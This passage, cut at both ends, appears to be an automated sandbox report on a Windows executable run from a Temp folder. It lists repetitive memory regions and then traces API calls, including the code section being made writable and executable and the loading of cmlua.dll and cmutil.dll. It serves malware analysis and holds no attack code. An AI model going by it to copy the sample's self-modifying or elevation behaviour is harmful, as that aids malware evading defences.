0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1641 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1642 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1643 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1644 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1645 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1646 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1647 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1648 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1649 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1650 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1651 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1652 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1653 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1654 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1655 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1656 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1657 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1658 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1659 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1660 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1661 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1662 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1663 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1664 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1665 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1666 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1667 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1668 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1669 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1670 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1671 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1672 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1673 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1674 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1675 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1676 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1677 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1678 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1679 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1680 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1681 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1682 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1683 start_va = 0x510000 end_va = 0x51ffff entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 1684 start_va = 0x2720000 end_va = 0x2b2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002720000" filename = "" Region: id = 1685 start_va = 0x2b30000 end_va = 0x2f3ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002b30000" filename = "" Region: id = 1686 start_va = 0x2f40000 end_va = 0x2f51fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002f40000" filename = "" Region: id = 1687 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1688 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1689 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1690 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1691 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1692 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1693 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1694 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1695 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1696 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1697 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1698 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1699 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1700 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1701 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1702 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1703 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1704 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1705 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1706 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1707 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1708 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1709 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1710 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1711 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1712 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1713 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1714 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1715 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1716 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1717 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1718 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1719 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1720 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1721 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1722 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1723 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1724 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1725 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1726 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1727 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1728 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1729 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1730 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1731 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1732 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1733 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1734 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1735 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1736 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1737 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1738 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1739 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1740 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1741 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1742 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1743 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1744 start_va = 0x510000 end_va = 0x510fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1745 start_va = 0x520000 end_va = 0x520fff entry_point = 0x0 region_type = private name = "private_0x0000000000520000" filename = "" Region: id = 1971 start_va = 0x75210000 end_va = 0x7528ffff entry_point = 0x75210000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 1972 start_va = 0x2720000 end_va = 0x289ffff entry_point = 0x0 region_type = private name = "private_0x0000000002720000" filename = "" Region: id = 1973 start_va = 0x2720000 end_va = 0x27fefff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002720000" filename = "" Region: id = 1974 start_va = 0x2860000 end_va = 0x289ffff entry_point = 0x0 region_type = private name = "private_0x0000000002860000" filename = "" Region: id = 1975 start_va = 0x2800000 end_va = 0x2800fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002800000" filename = "" Region: id = 1976 start_va = 0x76040000 end_va = 0x760c2fff entry_point = 0x76040000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 1977 start_va = 0x76720000 end_va = 0x767aefff entry_point = 0x76720000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 1978 start_va = 0x2810000 end_va = 0x2810fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002810000" filename = "" Region: id = 2024 start_va = 0x75070000 end_va = 0x751a5fff entry_point = 0x75070000 region_type = mapped_file name = "comsvcs.dll" filename = "\\Windows\\SysWOW64\\comsvcs.dll" (normalized: "c:\\windows\\syswow64\\comsvcs.dll") Region: id = 2025 start_va = 0x75490000 end_va = 0x754a3fff entry_point = 0x75490000 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\SysWOW64\\atl.dll" (normalized: "c:\\windows\\syswow64\\atl.dll") Region: id = 2050 start_va = 0x2820000 end_va = 0x2820fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002820000" filename = "" Region: id = 2051 start_va = 0x28a0000 end_va = 0x28dffff entry_point = 0x0 region_type = private name = "private_0x00000000028a0000" filename = "" Region: id = 2052 start_va = 0x28e0000 end_va = 0x2adffff entry_point = 0x0 region_type = private name = "private_0x00000000028e0000" filename = "" Region: id = 2053 start_va = 0x75380000 end_va = 0x7538dfff entry_point = 0x75380000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\SysWOW64\\RpcRtRemote.dll" (normalized: "c:\\windows\\syswow64\\rpcrtremote.dll") Region: id = 2054 start_va = 0x7efd5000 end_va = 0x7efd7fff entry_point = 0x0 region_type = private name = "private_0x000000007efd5000" filename = "" Region: id = 2275 start_va = 0x2ae0000 end_va = 0x2b1ffff entry_point = 0x0 region_type = private name = "private_0x0000000002ae0000" filename = "" Region: id = 2276 start_va = 0x2b20000 end_va = 0x2d1ffff entry_point = 0x0 region_type = private name = "private_0x0000000002b20000" filename = "" Region: id = 2277 start_va = 0x2d20000 end_va = 0x2d5ffff entry_point = 0x0 region_type = private name = "private_0x0000000002d20000" filename = "" Region: id = 2278 start_va = 0x2d60000 end_va = 0x2f5ffff entry_point = 0x0 region_type = private name = "private_0x0000000002d60000" filename = "" Region: id = 2279 start_va = 0x74660000 end_va = 0x7466bfff entry_point = 0x74660000 region_type = mapped_file name = "cmlua.dll" filename = "\\Windows\\SysWOW64\\cmlua.dll" (normalized: "c:\\windows\\syswow64\\cmlua.dll") Region: id = 2280 start_va = 0x7efaa000 end_va = 0x7efacfff entry_point = 0x0 region_type = private name = "private_0x000000007efaa000" filename = "" Region: id = 2281 start_va = 0x7efad000 end_va = 0x7efaffff entry_point = 0x0 region_type = private name = "private_0x000000007efad000" filename = "" Region: id = 2282 start_va = 0x75390000 end_va = 0x7539dfff entry_point = 0x75390000 region_type = mapped_file name = "cmutil.dll" filename = "\\Windows\\SysWOW64\\cmutil.dll" (normalized: "c:\\windows\\syswow64\\cmutil.dll") Region: id = 2283 start_va = 0x753b0000 end_va = 0x753b8fff entry_point = 0x753b0000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Thread: id = 104 os_tid = 0x5d0 [0104.228] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x28ff50 | out: lpSystemTimeAsFileTime=0x28ff50*(dwLowDateTime=0xe15823a0, dwHighDateTime=0x1d48db2)) [0104.228] GetCurrentProcessId () returned 0x698 [0104.228] GetCurrentThreadId () returned 0x5d0 [0104.228] GetTickCount () returned 0x276e3 [0104.228] QueryPerformanceCounter (in: lpPerformanceCount=0x28ff58 | out: lpPerformanceCount=0x28ff58*=1817185200000) returned 1 [0104.228] GetStartupInfoA (in: lpStartupInfo=0x28ff2c | out: lpStartupInfo=0x28ff2c*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0104.229] __set_app_type (_Type=0x2) [0104.237] __getmainargs (in: _Argc=0x41f01c, _Argv=0x41f018, _Env=0x41f014, _DoWildCard=0, _StartInfo=0x41f000 | out: _Argc=0x41f01c, _Argv=0x41f018, _Env=0x41f014) returned 0 [0104.244] VirtualQuery (in: lpAddress=0x401000, lpBuffer=0x28fd64, dwLength=0x1c | out: lpBuffer=0x28fd64*(BaseAddress=0x401000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0x15000, State=0x1000, Protect=0x20, Type=0x1000000)) returned 0x1c [0104.244] VirtualProtect (in: lpAddress=0x401000, dwSize=0x15000, flNewProtect=0x40, lpflOldProtect=0x28fdb0 | out: lpflOldProtect=0x28fdb0*=0x20) returned 1 [0104.245] VirtualQuery (in: lpAddress=0x4012b9, lpBuffer=0x28fd64, dwLength=0x1c | out: lpBuffer=0x28fd64*(BaseAddress=0x401000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0x15000, State=0x1000, Protect=0x80, Type=0x1000000)) returned 0x1c [0104.245] VirtualProtect (in: lpAddress=0x401000, dwSize=0x15000, flNewProtect=0x40, lpflOldProtect=0x28fd60 | out: lpflOldProtect=0x28fd60*=0x80) returned 1 [0104.245] VirtualProtect (in: lpAddress=0x401000, dwSize=0x15000, flNewProtect=0x80, lpflOldProtect=0x28fd60 | out: lpflOldProtect=0x28fd60*=0x40) returned 1 [0104.245] VirtualQuery (in: lpAddress=0x401000, lpBuffer=0x28fe94, dwLength=0x1c | out: lpBuffer=0x28fe94*(BaseAddress=0x401000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0x1000, State=0x1000, Protect=0x40, Type=0x1000000)) returned 0x1c [0104.245] VirtualProtect (in: lpAddress=0x401000, dwSize=0x1000, flNewProtect=0x20, lpflOldProtect=0x28fe90 | out: lpflOldProtect=0x28fe90*=0x40) returned 1 [0104.245] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4096a0) returned 0x0 [0104.246] strlen (_Str="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe") returned 0x30 [0104.246] _onexit (_Func=0x409e50) returned 0x409e50 [0104.246] strlen (_Str="use_fc_key") returned 0xa [0104.246] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="gcc-shmem-tdm2-use_fc_key") returned 0x2c [0104.246] WaitForSingleObject (hHandle=0x2c, dwMilliseconds=0xffffffff) returned 0x0 [0104.247] FindAtomA (lpString="gcc-shmem-tdm2-use_fc_key-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") returned 0x0 [0104.250] AddAtomA (lpString="gcc-shmem-tdm2-use_fc_key-aaaaaaaaaaaaaaaAaaaaaAAAAAaAaaaa") returned 0xc000 [0104.256] GetAtomNameA (in: nAtom=0xc000, lpBuffer=0x28fd7c, nSize=59 | out: lpBuffer="gcc-shmem-tdm2-use_fc_key-aaaaaaaaaaaaaaaAaaaaaAAAAAaAaaaa") returned 0x3a [0104.262] ReleaseMutex (hMutex=0x2c) returned 1 [0104.262] CloseHandle (hObject=0x2c) returned 1 [0104.262] strlen (_Str="sjlj_once") returned 0x9 [0104.262] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="gcc-shmem-tdm2-sjlj_once") returned 0x2c [0104.262] WaitForSingleObject (hHandle=0x2c, dwMilliseconds=0xffffffff) returned 0x0 [0104.262] FindAtomA (lpString="gcc-shmem-tdm2-sjlj_once-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") returned 0x0 [0104.262] AddAtomA (lpString="gcc-shmem-tdm2-sjlj_once-aaaaaaaaaaaaaaaAaaaaaAAAAAaAAaaa") returned 0xc001 [0104.262] GetAtomNameA (in: nAtom=0xc001, lpBuffer=0x28fd5c, nSize=58 | out: lpBuffer="gcc-shmem-tdm2-sjlj_once-aaaaaaaaaaaaaaaAaaaaaAAAAAaAAaaa") returned 0x39 [0104.262] ReleaseMutex (hMutex=0x2c) returned 1 [0104.262] CloseHandle (hObject=0x2c) returned 1 [0104.262] strlen (_Str="once_global_shmem") returned 0x11 [0104.262] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="gcc-shmem-tdm2-once_global_shmem") returned 0x2c [0104.262] WaitForSingleObject (hHandle=0x2c, dwMilliseconds=0xffffffff) returned 0x0 [0104.262] FindAtomA (lpString="gcc-shmem-tdm2-once_global_shmem-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") returned 0x0 [0104.263] AddAtomA (lpString="gcc-shmem-tdm2-once_global_shmem-aaaaaaaaaaaaaaaAaaaaaAAAAAAaaaaa") returned 0xc002 [0104.263] GetAtomNameA (in: nAtom=0xc002, lpBuffer=0x28fcec, nSize=65 | out: lpBuffer="gcc-shmem-tdm2-once_global_shmem-aaaaaaaaaaaaaaaAaaaaaAAAAAAaaaa") returned 0x40 [0104.276] ReleaseMutex (hMutex=0x2c) returned 1 [0104.276] CloseHandle (hObject=0x2c) returned 1 [0104.276] strlen (_Str="once_obj_shmem") returned 0xe [0104.276] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="gcc-shmem-tdm2-once_obj_shmem") returned 0x2c [0104.276] WaitForSingleObject (hHandle=0x2c, dwMilliseconds=0xffffffff) returned 0x0 [0104.276] FindAtomA (lpString="gcc-shmem-tdm2-once_obj_shmem-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") returned 0x0 [0104.276] AddAtomA (lpString="gcc-shmem-tdm2-once_obj_shmem-aaaaaaaaaaaaaaaAaaaaaAAAAAAaAAaa") returned 0xc003 [0104.276] GetAtomNameA (in: nAtom=0xc003, lpBuffer=0x28fcfc, nSize=62 | out: lpBuffer="gcc-shmem-tdm2-once_obj_shmem-aaaaaaaaaaaaaaaAaaaaaAAAAAAaAAa") returned 0x3d [0104.276] ReleaseMutex (hMutex=0x2c) returned 1 [0104.276] CloseHandle (hObject=0x2c) returned 1 [0104.276] calloc (_Count=0x1, _Size=0x10) returned 0x20fe8 [0104.276] strlen (_Str="mutex_global_shmem") returned 0x12 [0104.276] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="gcc-shmem-tdm2-mutex_global_shmem") returned 0x2c [0104.276] WaitForSingleObject (hHandle=0x2c, dwMilliseconds=0xffffffff) returned 0x0 [0104.276] FindAtomA (lpString="gcc-shmem-tdm2-mutex_global_shmem-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") returned 0x0 [0104.276] AddAtomA (lpString="gcc-shmem-tdm2-mutex_global_shmem-aaaaaaaaaaaaaaaAaaaaAaaaaaaaaaaa") returned 0xc004 [0104.277] GetAtomNameA (in: nAtom=0xc004, lpBuffer=0x28fc9c, nSize=66 | out: lpBuffer="gcc-shmem-tdm2-mutex_global_shmem-aaaaaaaaaaaaaaaAaaaaAaaaaaaaaaa") returned 0x41 [0104.277] ReleaseMutex (hMutex=0x2c) returned 1 [0104.277] CloseHandle (hObject=0x2c) returned 1 [0104.277] calloc (_Count=0x1, _Size=0x1c) returned 0x21018 [0104.277] CreateSemaphoreA (lpSemaphoreAttributes=0x0, lInitialCount=1, lMaximumCount=2147483647, lpName=0x0) returned 0x2c [0104.277] WaitForSingleObject (hHandle=0x2c, dwMilliseconds=0xffffffff) returned 0x0 [0104.277] GetCurrentThreadId () returned 0x5d0 [0104.277] strlen (_Str="_pthread_tls_once_shmem") returned 0x17 [0104.278] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="gcc-shmem-tdm2-_pthread_tls_once_shmem") returned 0x30 [0104.278] WaitForSingleObject (hHandle=0x30, dwMilliseconds=0xffffffff) returned 0x0 [0104.278] FindAtomA (lpString="gcc-shmem-tdm2-_pthread_tls_once_shmem-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") returned 0x0 [0104.278] AddAtomA (lpString="gcc-shmem-tdm2-_pthread_tls_once_shmem-aaaaaaaaaaaaaaaAaaaaAaaaaaAaaaaa") returned 0xc005 [0104.278] GetAtomNameA (in: nAtom=0xc005, lpBuffer=0x28fcbc, nSize=71 | out: lpBuffer="gcc-shmem-tdm2-_pthread_tls_once_shmem-aaaaaaaaaaaaaaaAaaaaAaaaaaAaaaa") returned 0x46 [0104.278] ReleaseMutex (hMutex=0x30) returned 1 [0104.278] CloseHandle (hObject=0x30) returned 1 [0104.278] calloc (_Count=0x1, _Size=0x10) returned 0x21050 [0104.278] calloc (_Count=0x1, _Size=0x1c) returned 0x21068 [0104.278] CreateSemaphoreA (lpSemaphoreAttributes=0x0, lInitialCount=1, lMaximumCount=2147483647, lpName=0x0) returned 0x30 [0104.278] WaitForSingleObject (hHandle=0x30, dwMilliseconds=0xffffffff) returned 0x0 [0104.278] GetCurrentThreadId () returned 0x5d0 [0104.278] strlen (_Str="_pthread_tls_shmem") returned 0x12 [0104.278] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="gcc-shmem-tdm2-_pthread_tls_shmem") returned 0x34 [0104.278] WaitForSingleObject (hHandle=0x34, dwMilliseconds=0xffffffff) returned 0x0 [0104.278] FindAtomA (lpString="gcc-shmem-tdm2-_pthread_tls_shmem-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") returned 0x0 [0104.278] AddAtomA 